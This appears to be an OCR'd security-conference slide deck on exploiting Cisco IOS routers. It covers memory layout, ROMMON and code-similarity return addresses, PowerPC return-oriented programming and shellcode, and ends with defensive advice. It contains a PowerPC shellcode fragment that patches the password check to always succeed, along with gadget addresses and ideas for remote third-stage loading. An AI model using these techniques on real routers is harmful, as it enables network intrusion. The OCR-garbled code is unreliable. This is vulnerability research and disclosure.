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Architectural considerations 
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Introduction 









Exploitation of router vulnerabilities has been shown 
independently before 

■ Primary focus on Cisco IOS 

Notable incidents in the wild have not been registered within 
the security community 

■ Successful but unnoticed attacks are unlikely, due to the fragile 
nature of the target (more on this later) 

All publicized incidents were based on: 

■ Configuration issues 

■ Insider attacks 

■ Trivially exploitable functional vulnerabilities 

The limited data from Recurity Labs CIR Online supports 
that observation 
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Motivation 









Everything handling even remotely remote data 
gets exploited all the time 
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|j ■ It has been established that control over 

8 



infrastructure equipment is desirable for an attacker 

■ Therefore, unique obstacles obviously prevent 
wide-scale & high quality exploitation of routers 

■ Knowing these obstacles is the way to notice 
developments in which the same are overcome 

■ These developments will herald a new age 
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Vulnerabilities in Routers 

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
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Vulnerabilities 












There is comparably little public vulnerability 
research for network equipment 

■ In 2008, only 14 vulnerabilities in Cisco IOS published 

■ Juniper only reports a memory leak and OpenSSL issues 

■ Nothing on Nortel Networks 

Vulnerabilities are often fixed as functional issues 
and classified accordingly 

■ E.g. "malformed packet crashes router" 

■ Will not make it into the vulnerability databases 
- Information only accessible to customers /*CZX ) 
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Service Vulnerabilities 









Vulnerabilities in network facing services were the 
£ big deal in network leaf nodes (aka. servers) 

Routers run network services too 

■ Remote administration interfaces 

■ SNMP (see CVE-2008-0960) 

■ TFTP / FTP / HTTP Services 

■ Never used in well configured networks 

■ Sloppy managed networks don't need router exploits 

Most custom implementations of router services 
had vulnerabilities in the past 

■ Apart from fixes, little changes over versions 

■ No new vulnerabilities introduced 









/rwerCt c£ *lfet4U± 




Recurity Labs 



Service Vulnerabilities 









Routers expose little functionality to truly remote 
attackers 

■ Routing protocols are run "internally" 

■ EIGRP / OSPF require multicast access 

■ RIP is too simple to be buggy © 

■ BGP requires explicit peer configuration 

■ DTP / VTP / CDP / etc. require local link access 

■ ISIS isn't even IP 

Within a multicast domain, routers are at risk 

In the Internet, network engineering principles say: 
You shall not accept routing information from 
arbitrary hosts. 
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Service Vulnerabilities 












A notable exception from the rules: 
cisco-sa-20070124-crafted-ip-option 

Triggered by: 

■ Internet Control Message Protocol (ICMP) 

■ Protocol Independent Multicast version 2 (PIMv2) 

■ Pragmatic General Multicast (PGM) 

■ URL Rendezvous Directory (URD) 

Vulnerability caused by individual parsing code in IOS 

■ IP Options parsed after a End-of-Options (0x00) was found 
Stack based buffer overflow in the attempt to reverse a 
source route for the generated ICMP reply 



It is not uncommon for routers to get pinged 
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Upcoming Vulnerabilities 









The landscape changes. Routers now support: 

IPv6 

VoIP: H.323, H.225.0, H.245.0, SIP 

Lawful Interception Functionality 

SSL VPN 

Web Service Routing 

XML-PI 

Web Service Management Agent 
Huawei Quidway access routers come with H.323 services 
enabled by default 

Luckily, adoption is slow. 

■ Network engineers just don't want application level functionality on 
their devices. 
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Client Side Vulnerabilities 



Routers are rarely used as clients 



_E_ 
_D 

i ■ Exceptions are: 

A 

9_ ■ Telnet / SSH connections into other routers 



■ File transfers from / to the router 

■ Authentication services (RADIUS, TACACS+) 

■ Name resolution (DNS) - potentially unintentional 

■ The new services will change that as well 

■ Routers talking to VoIP infrastructure 

■ Routers talking to HTTP servers 

■ Up until now, Client Side doesn't play a role. 
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Transit Vulnerabilities 









Most powerful: Vulnerabilities triggered by traffic 
passing through the router 

■ Would be really bad if triggered after forwarding 

Most unlikely: Routers try really hard to not look at 
traffic 

■ Inspecting packets is expensive 

■ Forwarding should be handled in hardware as much and 
as often as possible 

Some traffic must be inspected on every hop 

■ Source routed packets 

■ Hop-by-Hop headers in IPv6 
No true Transit Vulnerability known so far /^bb 
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Vulnerabilities in Routers 

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
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OS Architectures Comparison 
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Product 



Cisco IOS 



Cisco Service 
Modules 



Juniper JUNOS 



Huawei VRP(1) 



Huawei VRP (2) 



$DSL_Router 



OS Design 



Monolithic ELF 



Linux 2.4 based 



FreeBSD 3.x based 



VxWorks 5.x based 



Linux 2.x based 



Linux 2.x based 



Fault Behavior 



Device Crash 



Process Crash / 
Module Crash 



Process Crash 



Device Crash 



Process Crash 



Process Crash 



Exploitability 



Hard 



Interesting 



Probably known 



A little tricky 



Known 



Known 
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The Easy Ones 



























































■ 












-, : 











Router operating systems based on standard 
UNIX architectures are respectively easy to 
exploit 

■ Virtual address spaces for every process 

■ No fancy protection mechanisms 

■ Most things run as UID 
Everything behaves the way attackers know it 
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The Hard One 






IOS is a single large binary program (ELF) running 
directly on the main CPU 

■ Shared memory architecture 

■ Virtual memory mapping according to ELF header 

■ CPU (PPC32, MIPS32 or MIPS64) in Supervisor mode 

One single shared Heap 

■ Doubly-linked list of memory blocks 

Processes are threads with CPU context and stack 
block allocated on the heap 

■ No virtual memory space 
Run-to-completion scheduler (like Windows 95) 
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Consequences of Design 









■ IOS cannot recover from exceptions 
f ■ Any exception causes the device to restart 



I ■ IOS cannot recover from memory corruptions 
-Is the heap linked list corrupted, the device restarts 

■ Integrity checks on the heap are performed with every 
allocation / de-allocation 

■ Additional integrity tests are performed by CheckHeaps 
IOS cannot recover from CPU hogs 

■ If a process does not return execution to the scheduler, a 
CPU watchdog restarts the device >^=^ 

m 
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IOS Memory Layout 
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Memory is laid out based on the image base 

10 memory is laid out based on physical 
interfaces and configuration 



Static address 









Start End Size(b) 
0X03C00000 Ox03FFFFFF 4194304 
0x60000000 0x60FFFFFF 16777216 
0x80000000 Dependencies 62914560 

0x8000808C uxBuy^By^ 9777148 

0x8095B088^-13fxK5cDBicB "3673924 

0x80CDBFCC^-0^HnDE^i&7 — - — 1117980 
0x80DECEE8 *-0xT?3bfffff 48312600 



Class Media Name 



iomem R/w 
Flash R/O 
Local 
IText 



R/W 
R/O 



iData R/w 

R/W 
R/W 



IBSS 

Local 



iomem 
flash 
main 

main :text 
main: data 
main:bss 
main: heap 
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The IOS Image Hell 






Every IOS image is built from the scratch 

Contents of the build decided by: 

■ Platform 

■ Major/ Minor Version 

■ Release Version 

■ Train 

■ Feature-Set 

■ Special Build 

272722 different IOS Images known to the Cisco 
Feature Navigator on CCO in June 2009 ^_ 

■ Theoretically, this means as many memory layouts /ftZ*) 
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The IOS Image Hell 















For exploitation that means: 

■ Assumptions about locations of specific code have a 
chance of 0.000366% to be correct 

■ Assumptions about the start of the Heap are just as good 

■ Since Stacks are Heap allocated blocks of memory, 
correct guesses about the stack location are even less 
likely 

lOS's build process provides a far higher 
unpredictability of memory layout than any ASLR 
technology currently in use! 
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The IOS Image Hell 






The image diversity is also a problem for shellcode 

■ The whole thing is compiled at once 

■ The image does not contain any symbols 

■ The image does not contain an exported list of functions 

■ There is no guarantee that structures are equal between 

images 

■ In fact, it's almost guaranteed that someone at Cisco decided to 
expand or reorder a structure because they felt like it. 

Use of platform code (what shellcode normally 
does) is not so easy on IOS. 
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Vulnerabilities in Routers 

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
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MIPS^P 
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Where to (re)turn to? 



Stack: it's somewhere in the heap (unpredictable) 
IOS Code: it's location depends on the image version 

■ You would need to know the image version, which you don't 

■ You would need to have a copy of exactly that image, which you don't 
IOS data/rodata/bss sections: location and structure depend on the 
image version 

■ Comparing 1 597 images for Cisco 2600, only 24 (1 .5%) have a section 
(.data) at the same address 

■ 12.4 images seem to use alignment for sections now 
IOMEM: useless, not executable 

Heap spray: not applicable 

■ attacker has rarely any control over the heap 
Partial overwrites are not an option either, as IOS runs on PPC32, 
MIPS32 and MIPS64 in Big Endian mode 
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The Current Best Bet 















Cisco routers use a bootstrap loader called 
ROMMON 

■ ROMMON is mapped initially into memory through 
hardware initialization 

■ ROMMON provides a very basic CLI 

■ ROMMON provides the initial exception handlers 

ROMMON is mapped at fixed addresses 

■ OxFFFOOOOO for Cisco 1700 

■ OxFFFOOOOO for Cisco 2600 

■ 0x1 FC00000 for Cisco 3640 

■ 0x1 FC00000 for Cisco 3660 
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ROMMON Versions 






ROMMON Version distribution is a lot smaller 

ROMMON is rarely updated 

■ Therefore, versions depend on shipping date 

■ Cisco prefers bulk sales of devices 




C2600 Version ROMMON Distribution 
(based on Goolge searches) 



*rf<& 




ROMMON Version Distribution 
in a real world network (571 devices) 
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Return Oriented Programming* 









Chaining together function epilogs before 
return to gain arbitrary functionality 

■ One of these hacking techniques that every 
sufficiently talented hacker with a need came up 
with independently 

Has been shown to work nicely on IA-32 and 
SPARC code using an entire glibc 

■ We have 146556 bytes (36639 instructions) and 
a PowerPC CPU that returns via LR ^^ 



* „Return-oriented Programming: Exploitation without Code Injection" 

Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham - University of California, San Diego 
http://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf 
~ 7? 
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Return Oriented on PowerPC 

















Buffer 


[here be buffer overflow] 

Iwz %r0, 0x20+arg_4(%sp) 

mtlr %r0 

Iwz %r30, 0x20+var_8(%sp) 

Iwz %r31, 0x20+var_4(%sp) 

addi %sp, %sp, 0x20 

blr 

4 


N=e 


Buffer 


Buffer 


Buffer 


saved R30 


saved R31 


saved SP 


\ 






^ 




saved LR 


FUNC_02 : Memory write! 

stw %r30, 0xAB(%r31) 
Iwz %r0, 0xl8+arg_4(%sp) 
mtlr %r0 

Iwz %r28, 0xl8+var_10(%sp) 
Iwz %r29, 0xl8+var_C(%sp) 
Iwz %r30, 0xl8+var_8(%sp) 
Iwz %r31, 0xl8+var_4(%sp) 

:arlrH °/cr» °/cr» flvl 8 


¥ 




saved R28 


saved R29 


saved R30 


saj/ed R31 


saved SP 


saved LR s 


aucn ToSp, ToSp, UXlO 

blr 


* 


stuff 
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Too Much Cache 






PowerPC has separate 
instruction and data caches 

Executing data you just wrote 
doesn't work 
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memcpy() i^ 
return 

CPU^V 




D-Cache 










l-Cache 
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Memory 
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More Code Reuse 






The Bootstrap code 

already brings 

functionality that we 

need: 

Disable all caches! 

IOS doesn't care 
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stwu %sp, -0x10 (%sp) 

mf 1 r %r0 

stw %r31, 0xl0+var_4(%sp) 

stw %r0, 0xl0+arg_4(%sp) 

bl Disable_interrupts 

mr %r31, %r3 

mfspr %r0, dc_cst 

cmpwi crl, %r0, 

bge crl, NoDataCache 

bl Flush_Data_Cache 

bl unlock_Data_Cache 

bl Di sabl e_Data_Cache 

NoDataCache: 

bl invalidate_instruction_cache 

bl unlock_instruction_cache 

bl Disable_instruction_cache 

mfmsr %r0 

rlwinm %r0, %r0, 0,28,25 

mtmsr %r0 

cmpwi crl, %r31, 

beq crl, interruptsAreOff 

bl Enableinterrupts 

InterruptsAreOff: 

lwz %r0, 0xl0+arg_4(%sp) 

mtl r %r0 

lwz %r31, 0xl0+var_4(%sp) 

addi %sp, %sp, 0x10 

blr 
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Reliable Code Execution 
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Getting away with it 



















Reliable code execution is nice, but an attacker 
needs the device to stay running 

■ We can't just keep running our shellcode, remember the 
Windows 95 scheduler? 

Andy Davis et al have called the TerminateProcess 
function of IOS 

■ Needs the address of this function, which is again image 
dependent 

■ Exactly what is not wanted! 

■ Crucial processes should not be terminated 

■ IP Options vulnerability exploits "IP Input" 



- ■ 

■ 
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Getting away with it 






Remember the stack layout? 

We search the stack for a stack frame 

sequence of SP&LR upwards 

■ Once found, we restore the stack pointer 
and return to the caller 

This is reliable across images, as the 
call stack layout does not change 
dramatically over releases 

This has been shown to be mostly true on 
other well exploited platforms 
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jknor 



;kfor 



;kror 



R31 



iav c ;d LR 



saved R28 



saved R29 



saved R30 



saved R31 



saved SP 



saved LR 



stuff 
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The Downside of ROMMON 









S ■ You need to have a copy of the respective 



ROMMON for disassembly 

■ ROMMON updates are available on CCO 

■ The interesting (read: old) versions are not 

You cannot remotely fingerprint ROMMON 

■ It is unused dormant code 

You still need to know what hardware 
platform you are dealing with 

m 






/rwerCt c£ "l^tA^± 



Recurity Labs 









Alternatives to ROMMON 









What if we could use the same technique, but 
return into the IOS image code? 

■ We can remotely fingerprint the IOS image 
But aren't the image addresses all random? 

■ Well, that's exactly the question 

Performing an extensive search over multiple IOS 
images for the same platform 

■ Requiring a BLR instruction 

■ Requiring LR restore via stack (R1) 

■ Requiring write to pointer in R26-R31 

■ Requiring single basic block //%r* ) 
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Code Similarity (4 images) 






8001435c 
80014360 
80014364 
80014368 
8001436c 
80014370 
80014374 
80014378 
8001437c 
80014380 
80014384 
80014388 
8001438c 
80014390 
80014394 
80014398 
8001439c 
8001 43a0 



c2600-a3jk8s-mz.1 22-28c 

stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(M) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(M) 
addi r1,r1,32 
blr 









c2600-a3jk8s-mz.1 22-29b 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li 1-0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz rO,36(M) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1 ,r1 ,32 
blr 



c2600-a3jk8s-mz.1 22-37 

stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1,r1,32 
blr 



c2600-a3jk8s-mz.1 22-46 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(M) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1,r1,32 
blr 
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c2600-a3jk8s- 

8001435c stw r29, 
80014360 li r0,36 
80014364 sth r0,68(r30) 
80014368 mr r3,r30 
8001436c Iwz r0,36(r1) 
80014370 



r30) 



80014374 

80014378 

8001437c 

80014380 

80014384 

80014388 addi 

8001438c blr 

80014390 

80014394 



r27,12(r1) 
r28,16(r1) 
r29,20(r1) 
r30,24(r1) 
r31,28(M) 
'1,32 



c2600-i-mz.122-28c 

8001435c stw r29,36(r30) 

80014360 li r0,36 

80014364 sth r0,68(r30) 

80014368 mr r3,r30 

8001436c Iwz r0,36(r1) 

80014370 mtlr rO 

80014374 Iwz r27,12(r1) 

80014378 Iwz r28,16(r1) 

8001437c Iwz r29,20(r1) 

80014380 Iwz r30,24(r1) 

80014384 Iwz r31,28(r1) 

80014388 addi r1,r1,32 

8001438c blr 



80014390 
80014394 
80014398 
8001439c 
8001 43a0 



: c2600-a3jk8s-mz.122- 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 



■29b c2600-a3jk8s-mz.1 22-37 C 2600-a3jk8s-mz.1 22-46 c2600-a3js-mz.122-28c c2600-a3js-mz.122-29b c2600-a3js-mz.122- 






1,32 









c2600-i-mz.122-29b 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1,r1,32 
blr 



v r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(M) 

Iwz r28,16(r1) 

Iwz r29,20(r1) 

z r30,24(r1) 

z r31,28(r1) 






1,32 



c2600-i-mz.1 22-37 

stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1,r1,32 
blr 



i r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 



i .?,?. 



c2600-i-mz.1 22-46 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz rO,36(M) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi M,r1,32 
blr 



v r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(M) 

Iwz r28,16(r1) 

Iwz r29,20(r1) 

z r30,24(r1) 

z r31,28(r1) 



addi r 
blr 



-1,32 



h r3,18(r31) 
w r27,184(r30) 
/z r9,92(r27) 
z r0,414(r9) 
h r0,72(r30) 
w r29,36(r30) 
r0,36 

h r0,68(r30) 
r r3,r30 
iz r0,36(r1) 
tlr rO 

it r27,12(M) 
iz r28,16(r1) 
/z r29,20(r1) 
iz r30,24(r1) 
a r31,28(r1) 



v r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 

Iwz r28,16(r1) 

Iwz r29,20(r1) 

z r30,24(r1) 

z r31,28(r1) 



addi r 
blr 



-1,32 



•1 32 



■37 c2600-a3js-mz.1 22-46 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 

Iwz r27,12(r1) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 






blr 



1,32 



c2600-io3-mz.122- 

stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(r1) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1.r1.32 
blr 



28c c2600-io3-mz.122-29b 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 



li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(r1) 
addi r1.r1.32 
blr 



7 c2600-io3-mz.1 22-46 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 



blr 



1,32 
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_D 
_C 
_B_ 

A 
9_ 
8_ 
7 



Code Dissimilarity 



c2600-a3jk8s-mz.1 22-28c 

stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(M) 
addi r1,r1,32 
blr 















c2600-a3jk8s-mz.1 22-29b 

sth r3,18(r31) 
stw r27,184(r30) 
Iwz r9,92(r27) 
Ihz r0,414(r9) 
sth r0,72(r30) 
stw r29,36(r30) 
li r0,36 
sth r0,68(r30) 
mr r3,r30 
Iwz r0,36(r1) 
mtlr rO 

Iwz r27,12(r1) 
Iwz r28,16(M) 
Iwz r29,20(r1) 
Iwz r30,24(r1) 
Iwz r31,28(M) 
addi r1,r1,32 
blr 









Select First Image Parameters 



Release Number 



12.2f28c) 



2610-2613 
-ir. i Set'License(s) 



E',"-R ee y;-~z : u; -1-.: =1 



ty 




Select Second Image Pararne e s 




~z-:'.\ - - 




10s 




Major Release 




12.2 




Release Number 




12 2(29 b) t 




- .-":■■" 




2610-2613 




-i :-:.-t 3et''License(s) 





Er.'ERPH EE E-f.-E -_. E = EEE :■: 




Common Features in Both Imagi 



Identical Features! 
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Code Similarity Results 






_D 
_C 

_B_ 
A 

_9_ 

5" 






Count 



1597 



326 



249 



224 



223 



210 






Percent 



100% 



20.4% 



15.6% 



14.0% 



13.9% 



13.1% 



Address 



80009534 



80040990 



80014360 



80040984 



80018554 



Type 



Cisco 2600 IOS 12.1 -12.4 
with all possible feature sets 



Arbitrary memory write 



Fixed memory write 



Arbitrary memory write 



Fixed memory write 



Memory write with R0 
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ROMMON vs. Code Similarity 


^ROMMON 


Imaqe Similarity 


■ Perfect addresses 


■ Likely addresses (code 


(no dependencies) 


flow dependencies) 


■ Cache disabling 


■ Cache still an issue 


■ 30% chance of success 


■ 13% -20% chance of 


based on in-the-wild 


success over all 


data 


available images 


■ Cannot be fingerprinted 


■ Can be fingerprinted 
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Return Address Dilemma Summary 









The return address is one of the hardest 
problems in IOS exploitation 

The ROMMON method is reliable 

■ Iff you know or guess the ROMMON version 

Code similarity appears to be promising 

■ Experiments only had access to 1597 of 5961 
images available for Cisco 2610-2613 (26.8%) 

Work in progress... 

m 
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Vulnerabilities in Routers 

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
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IOS Shellcode 
















■ i 












■ IOI\ 
















■ 












-, : 











Shellcode for PPC32 and MIPS32/64 is big 

■ In stack overflows, it's easy to cross the heap block 
boundary and corrupt the heap 

■ Heap repairing stack shellcode can be used to temporarily repair 
the heap until CheckHeaps verifies it or the following heap 
block's content is used by IOS 

■ The stack should stay partially clean, so the return into a 
caller still works 

Second stage code is almost always required 

■ IOMEM base addresses are not stable 
Searching IOMEM is not reliable yet, but works 

IOMEM searching will be harder on larger devices y^=^ 
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Bind Shellcode 















Shellcode can create or modify VTYs 

■ VTYs can be exposed by Telnet, RSH or SSH 

■ Such shellcode has been shown before 

To create a VTY, IOS functions must be called 

■ Using fixed addresses in the image is (again) not an 
option 

Alternatively, IOS data structures can be modified 

■ Using fixed addresses of the data structure is wrong 

■ Using fixed offsets within the data structure is also not 
reliable, as such offsets change frequently 

AAA configurations must be observed! 
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Alternative Shellcode Approach 









Shellcode can modify the actual runtime code 
instead of using it 

■ Only a single code point must be identified 

■ To cover AAA configurations, a second code point is 
needed 

Modified runtime image does no longer validate 
passwords 

■ Alternative use for the same method is disabling ACL 
matching 

■ Can become tricky when ACLs are used for other purposes than 
just filtering incoming traffic 

How to find the address of the function? 
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Disassembling Shellcode 









When searching for code manually, one often 
follows string references 



.roaa£a:8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 
,rodata:8 
.rodata :8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 
.rodata:8 
.rodata :8 



0HU4bb3 HO 
0A84E54 50 
0A84E54 77 
0A84E54 3A 
0A84E5F 00 
0A84E6 0A 
0A84E6 42 
0A84E60 70 
0A84E60 77 
0A84E73 00 
0A84E74 0D 
0A84E74 
0A84E74 
0A84E77 00 
0A84E78 0A 
0A84E78 25 
0A84E78 69 
0A84E78 75 
0A84E90 25 
0A84E90 74 
0A84E90 20 



align z 

string "Password: " ft DATA XREF: sub_802B2378+48To 

ft sub_802B2378+58To 
byte 
.align 4 
25 25 20+aBadPasswords: .string "\n" ft DATA XREF: sub_802B2378+A4To 

61 64 20+ ft SUb_802B2378+A8To 

61 73 73+ .string "%% Bad passwords\n" 

—yjjjj.mi.iI'Luiii.u.a 

ascj| Dire... I T..I Address | Text 

addi %[2>, 'hi'}. aBadPasswords@ltt "\riZX Bad passwordsW 

25 25 20+aSTii 

73 20 74+ 
6D 65 6F+ 

74 20 65+ 
25 20 25 + aTIsi 



61 73 73+aPassuord_2 
6F 72 64+ 
20 00 




Help 



20 69 73+ l Line * of 2 

61 6E 20+ 



ft .text:802B2668to 
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Disassembling Shellcode 









Shellcode can do the same: 

1 . Find a unique string to determine its address 

2. Find a code sequence of LIS / ADDI loading the 
address of this string 

■ Watch out for variants using the negative equivalent 

■ Watch out for variants using ORI instead of ADDI 

3. Go backwards until you find the STWU %SP 
instruction, marking the beginning of the function 

4. Patch the function to always return TRUE 

m 
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Disassembling Shellcode 






bl .code 


.findlis: 






.string ..unique String to look for" 


Iwz %r4, 0x0(%r5) 




_E_ 




. byte 0x00 


rlwinm %r4, %r4, 0, 0xF8lFFFFF 






. byte 0x00 


cmpw %crl, %r4, %r7 




D 




.code: 


bne %crl, .findlisnext 




C 




mflr %r3 


Iwz %r4, 0x4(%r5) 




B 




lmw %r29,0x0(%r3) 


rlwinm %r4, %r4, 0, 0xF800FFFF 




A 




lis %r3, 0x8000 


cmpw %crl, %r4, %r8 




1 




ori %r3,%r3, 0x8000 


beq %crl, .loadfound 






mr %r5,%r3 


.findlisnext: 




8 

i 




.find_r29: 
Iwz %r4,0x0(%r3) 
cmpw %crl, %r4, %r29 
bne %crl, .findnext 
Iwz %r4,0x4(%r3) 
cmpw %crl, %r4, %r30 
bne %crl, .findnext 
Iwz %r4,0x8(%r3) 


addi %r5, %r5, 4 
b .findlis 

.loadfound: 
xor %r6, %r6, %r6 
ori %r6, %r6, 0x9421 
lhz %r4, 0x0(%r5) 
cmpw %crl, %r4, %r6 




* 




cmpw %crl, %r4, %r31 
beq %crl, .stringfound 


beq %crl, .functionFound 
addi %r5, %r5, -4 






.findnext: 


b .loadfound 






addi %r3,%r3,4 








b .find_r29 


.functionFound: 






# string address is now in R3 


lis %r4, 0x3860 






.stringfound: 


ori %r4, %r4, 0x0001 




i >■ 


lis %r7, 0x3800 


stw %r4, 0x0(%r5) 






rlwinm %r6, %r3, 16, 16, 31 


addi %r5,%r5,4 


^n 




andi . %r8, %r3, OxFFFF 


lis %r4, 0x4e80 


\JJ 




or %r8, %r8, %r7 


ori %r4, %r4, 0x0020 


9<£ 






or %r7, %r7, %r6 


stw %r4, 0x0(%r5) 
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Advanced Ideas: TCL Loader 









Later IOS versions include TCL interpreters 

■ API exposed to the user 

■ Fully featured script interpreter 

Shellcode should be able to instantiate a new 
TCL interpreter 

■ Download third stage TCL script from remote 
location via TFTP (supported by IOS) 

■ Potentially modify interpreter to give raw memory 
access if required 

Christoph Weber's PH-Neutral 0x7d9 tall 







Recunty Labs 



Wet Dreams: The IOS Sniffer 













■ The 












































■ 












-, : 











Turning any Cisco IOS router into a full password sniffer is 
an naive idea 

■ The product line is designed for fast packet forwarding 

■ Speed is achieved by doing as much as possible in hardware 

■ "Punting" packets to perform DPI is going to kill the router with load 

■ Might work on low load access routers 
Lawful Interception code might change this 

■ Increasing deployment in carrier networks (Hello Zensursula!) 

■ Designed to intercept specific communication 

■ Designed to be invisible to the network operator 
The code is there, no matter if the MIBs are loaded 
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■ 




. 







IOS MITM 









Using IOS as MITM tool has the same general 
problems as an arbitrary packet sniffer 

Depending on feature-set, however, the 
functionality might already be there 

■ "TCP Intercept" can report TCP SEQ/ACK to a third party 

- Allowing to inject any traffic into the TCP stream 

■ DNS code can report TIDs to a third party 

- Allowing to spoof any DNS response 

■ Load balancing features can redirect HTTP requests for 
arbitrary hosts 
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Vulnerabilities in Routers 

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
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General Router Protection 









Good luck! 

Prevent traffic destined to any interface of the 
router itself at all cost 

■ Very specific exceptions for network management 

■ Don't forget the loopback and tunnel interfaces 

■ Don't forget IPv6 

Protect your routing protocol updates with MD5 
Don't run network services on routers 

■ HTTP/HTTPS/FTP/TFTP/etc. are out of question 

■ No matter what Cisco says, don't run VoIP services ^^~~^ 
Monitor your Service Modules independently /r)^) 






Recunty Labs 

Monitor Configs and Crashes 









Use a configuration monitoring tool like RANCIT 
("Really Awesome New Cisco conflg Differ") 

■ Detects manual configuration changes, new interfaces, 
new tunnels, etc. 

■ Data structure modifications are visible in the 
configuration 

■ Check http://www.shrubbery.net/rancid/ 
Configure Core Dumping 

■ For critical systems, increase Flash memory, so the 
entire set of core files can be stored locally 

■ For corporate networks, configure core dumping to a 
central FTP server 

Check http://cir.recurity-labs.com wiki for more 
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Complain to Cisco 









Nobody updates IOS and it is entirely Cisco's fault 

■ New IOS versions interpret configurations differently 

■ New IOS versions have different defaults 

■ Not even Cisco engineers know which 

Nobody can update a network if the result would be massive 
downtimes and outages 

■ Decent network engineers run 1 2.2 
